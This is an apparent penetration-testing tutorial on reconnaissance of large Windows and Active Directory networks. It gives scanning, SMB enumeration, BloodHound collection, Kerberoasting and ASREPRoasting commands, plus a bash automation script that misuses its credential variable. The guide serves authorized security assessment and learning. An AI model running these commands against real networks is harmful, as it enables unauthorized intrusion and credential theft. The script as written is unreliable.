GO KALI FREE
AdvancedGuides

Enterprise Network Reconnaissance: Large-Scale Windows Environment Mapping

Guide to performing reconnaissance across large enterprise Windows networks including domain enumeration, Active Directory mapping, and automated tool integration.

#enterprise#reconnaissance#active directory#network mapping#penetration testing#domain enumeration

Seeing the Whole Picture at Scale

Enterprise network reconnaissance is the systematic process of mapping large-scale Windows environments — hundreds or thousands of hosts, multiple domains, Active Directory forests, and complex trust relationships. Unlike small-scale assessments, enterprise reconnaissance demands automated tools, parallel execution, and structured data management to handle the volume of information.

Enterprise environments typically include domain controllers, file servers, workstations, printers, IoT devices, and cloud-connected services. Understanding the complete infrastructure is essential for identifying attack paths, lateral movement opportunities, and high-value targets in professional engagements.

Prerequisites

  • Kali Linux with all SMB and AD tools installed
  • Strong understanding of Windows networking and Active Directory
  • Experience with small-scale SMB enumeration
  • Network access to the target enterprise environment
  • Explicit written authorization for the engagement
  • Phase 1: Network Segmentation Discovery

    Enterprise networks are divided into VLANs and subnets. Map the network structure:

    # Discover live hosts across multiple subnets
    for subnet in 10.0.1.0/24 10.0.2.0/24 10.0.3.0/24; do
      nmap -sn $subnet -oG live_$subnet.txt
    done
    
    # ARP discovery on local segments
    netdiscover -r 10.0.1.0/24 -f
    netdiscover -r 10.0.2.0/24 -f
    

    Phase 2: SMB Service Identification

    Scan all discovered hosts for SMB services:

    # Mass SMB port scanning
    nmap -p 139,445 -iL live_hosts.txt -oX smb_scan.xml
    
    # Detect SMB versions across the network
    nmap -p 445 --script smb-os-discovery -iL smb_hosts.txt -oX smb_versions.xml
    
    # Identify domain controllers
    nmap -p 389,636,88,53 -iL live_hosts.txt -oX dc_scan.xml
    

    Phase 3: Domain Controller Identification

    Domain controllers are the high-value targets:

    # Find DCs via DNS
    nmap -p 53 -sV 10.0.1.0/24
    
    # LDAP enumeration to find DCs
    ldapsearch -x -H ldap://10.0.1.10 -b "DC=corp,DC=local" -D "cn=admin" -w pass "(objectClass=domainController)"
    
    # Enum4Linux against suspected DCs
    enum4linux -a 10.0.1.10
    

    Phase 4: Automated Share Enumeration

    Use CrackMapExec for parallel enumeration:

    # Enumerate all shares across the network
    crackmapexec smb 10.0.1.0/24 -u admin -p password --shares
    
    # Extract user lists from all hosts
    crackmapexec smb 10.0.1.0/24 -u admin -p password --users > users_all.txt
    
    # Password policy across the network
    crackmapexec smb 10.0.1.0/24 -u admin -p password --pass-pol
    
    # Find writable shares
    crackmapexec smb 10.0.1.0/24 -u admin -p password --shares --writable
    

    Phase 5: Active Directory Enumeration

    Deep AD enumeration for domain environments:

    # BloodHound collection
    bloodhound-python -u admin -p password -d corp.local -ns 10.0.1.10 -c All
    
    # Kerberoasting
    impacket-GetUserSPNs corp.local/admin:password -dc-ip 10.0.1.10 -request
    
    # ASREPRoasting
    impacket-GetNPUsers corp.local/ -usersfile users.txt -dc-ip 10.0.1.10 -format hashcat
    
    # LDAP domain enumeration
    ldapsearch -x -H ldap://10.0.1.10 -b "DC=corp,DC=local" -D "admin@corp.local" -w password "(objectClass=user)" sAMAccountName
    

    Phase 6: Trust Relationship Mapping

    Enterprise environments often have multiple domains with trust relationships:

    # Enum4Linux domain trust information
    enum4linux -a -u admin -p password 10.0.1.10 | grep -i trust
    
    # DNS enumeration for related domains
    dnsrecon -d corp.local -n 10.0.1.10
    
    # Nmap LDAP scripts for trust discovery
    nmap -p 389 --script ldap-search -script-args ldap.search.basedn="CN=System,CN=Configuration,DC=corp,DC=local" 10.0.1.10
    

    Phase 7: Data Management

    Large-scale enumeration produces massive data volumes:

    # Organize output by phase
    mkdir -p recon/{discovery,enumeration,ad,data}
    
    # Save all CrackMapExec output
    crackmapexec smb 10.0.1.0/24 -u admin -p password --shares | tee recon/enumeration/shares.txt
    
    # Combine user lists
    cat recon/enumeration/users_*.txt | sort -u > recon/data/all_users.txt
    
    # Create target lists for further testing
    grep "Pwn3d!" recon/enumeration/auth.txt > recon/data/computers_with_admin.txt
    

    Automation Script

    #!/bin/bash
    # Enterprise SMB Recon Script
    TARGET_RANGE="10.0.1.0/24"
    DC_IP="10.0.1.10"
    CREDS="admin:password"
    
    echo "[*] Phase 1: Host Discovery"
    nmap -sn $TARGET_RANGE -oG live_hosts.txt
    
    echo "[*] Phase 2: SMB Scanning"
    nmap -p 139,445 -iL <(grep "Up" live_hosts.txt | awk '{print $2}') -oX smb_hosts.xml
    
    echo "[*] Phase 3: Enumeration"
    crackmapexec smb $TARGET_RANGE -u $CREDS -p '' --shares > shares.txt
    crackmapexec smb $TARGET_RANGE -u $CREDS -p '' --users > users.txt
    crackmapexec smb $TARGET_RANGE -u $CREDS -p '' --pass-pol > pass_pol.txt
    
    echo "[*] Complete. Review output files."
    

    Common Challenges

  • **Account lockout**: Enumeration generates authentication attempts that may lock accounts
  • **Network segmentation**: Firewalls and VLANs may block cross-subnet scanning
  • **Rate limiting**: SMB services may throttle connections during bulk enumeration
  • **Detection**: Large-scale scanning generates significant network noise
  • **Data volume**: Managing thousands of hosts and users requires structured approach
  • Best Practices

  • Work in phases: discover → scan → enumerate → analyze
  • Use parallel execution where possible (CrackMapExec, Nmap threading)
  • Save all output in structured formats (XML, JSON, greppable)
  • Monitor for account lockout during credential testing
  • Correlate findings across tools for accuracy
  • Document the complete attack surface for the final report
  • Related Tools

  • [Nmap](/tools/nmap) — Network scanning and service detection
  • [Enum4Linux](/tools/enum4linux) — SMB enumeration
  • [CrackMapExec](/tools/crackmapexec) — Large-scale network attacks
  • [SMBClient](/tools/smbclient) — Share access testing
  • [NetExec](/tools/netexec) — Modern post-exploitation toolkit
  • [Hydra](/tools/hydra) — Password brute-force attacks
  • [Netdiscover](/tools/netdiscover) — ARP host discovery
  • Related Articles

  • [SMB Enumeration Complete Guide](/learn/smb-enumeration-complete-guide) — Beginner to advanced SMB workflow
  • [SMB Enumeration Guide](/learn/smb-enumeration-guide) — SMB discovery techniques
  • [Windows Reconnaissance Basics](/learn/windows-reconnaissance-basics) — Windows fundamentals
  • [Active Directory Fundamentals](/learn/active-directory-fundamentals) — AD security
  • [SMB Security Assessment](/learn/smb-security-assessment) — Share security testing
  • Learning Roadmap

  • Master [Nmap](/tools/nmap) for network scanning
  • Learn [Enum4Linux](/tools/enum4linux) for SMB enumeration
  • Practice with [SMBClient](/tools/smbclient) for share access
  • Scale with [CrackMapExec](/tools/crackmapexec) for network-wide operations
  • Study [Active Directory Fundamentals](/learn/active-directory-fundamentals) for AD enumeration
  • Advance to [NetExec](/tools/netexec) for modern post-exploitation
  • Summary

    Enterprise network reconnaissance requires a structured, phased approach to handle the complexity and scale of large Windows environments. From initial host discovery through Active Directory enumeration and trust relationship mapping, each phase builds a more complete picture of the target infrastructure. Automation, data management, and careful operational security are essential for successful enterprise assessments.

    Related SMB Tool Recommendations

  • [SMBClient](/tools/smbclient) — Verify share access and browse discovered SMB shares
  • [Enum4Linux](/tools/enum4linux) — Enumerate SMB users, groups, shares, and policies
  • [Enum4Linux-NG](/tools/enum4linux-ng) — Run modern SMB enumeration with structured output
  • [NBTScan](/tools/nbtscan) — Resolve NetBIOS names before deeper SMB testing
  • [CrackMapExec](/tools/crackmapexec) — Scale SMB enumeration across larger networks
  • [NetExec](/tools/netexec) — Use modern SMB and Active Directory automation
  • Knowledge Check

  • Why is network segmentation a challenge for enterprise reconnaissance?
  • How does CrackMapExec handle parallel enumeration across multiple hosts?
  • What is the significance of domain controllers in AD reconnaissance?
  • How do trust relationships expand the attack surface in multi-domain environments?
  • What data management practices are essential for large-scale assessments?
  • Frequently Asked Questions

    What is enterprise network reconnaissance?

    Enterprise network reconnaissance is the systematic process of mapping large-scale Windows environments including hundreds or thousands of hosts, multiple domains, Active Directory forests, and complex trust relationships using automated tools and structured data management.

    How does CrackMapExec handle parallel enumeration across multiple hosts?

    CrackMapExec uses built-in threading and connection pooling to test credentials, enumerate shares, and extract user lists across entire network ranges simultaneously. It processes multiple hosts in parallel while managing connection limits to avoid overwhelming targets.

    What is the significance of domain controllers in AD reconnaissance?

    Domain controllers host Active Directory databases containing all user accounts, group memberships, group policies, and authentication data. Compromising a DC provides full domain control, making them the highest-value targets in Windows environments.

    How do trust relationships expand the attack surface in multi-domain environments?

    Trust relationships allow authentication between domains, meaning compromised credentials in one domain can potentially access resources in trusted domains. Two-way trusts, forest trusts, and external trusts each create different lateral movement paths.

    Why is network segmentation a challenge for enterprise reconnaissance?

    Enterprise networks use VLANs, firewalls, and subnetting to isolate segments. Cross-subnet scanning may be blocked, requiring multiple vantage points or pivot techniques to enumerate all hosts and services across the segmented infrastructure.

    What tools are used for enterprise SMB reconnaissance?

    Key tools include Nmap for host discovery and port scanning, CrackMapExec and NetExec for parallel SMB enumeration, BloodHound for AD attack path analysis, and Impacket for Kerberoasting and ASREPRoasting attacks.

    How do you identify domain controllers during reconnaissance?

    Search for hosts with LDAP (389/636), Kerberos (88), and DNS (53) ports open alongside SMB. Use DNS SRV record queries, LDAP enumeration with `ldapsearch`, or Nmap scripts like smb-os-discovery to identify DCs by their domain role.

    What is BloodHound and how does it help enterprise reconnaissance?

    BloodHound maps Active Directory attack paths by collecting data on users, groups, computers, sessions, and trust relationships. It identifies shortest paths to domain admin, Kerberoastable accounts, and ACL-based privilege escalation chains.

    How do you manage data from large-scale SMB enumeration?

    Organize output by phase into structured directories, save results in XML/JSON formats for parsing, combine user lists with `sort -u`, and identify high-value targets like computers with admin access for focused follow-up testing.

    What are common challenges in enterprise network reconnaissance?

    Common challenges include account lockout from enumeration attempts, network segmentation blocking cross-subnet scans, rate limiting on SMB services, detection from network noise, and managing data volumes from thousands of hosts.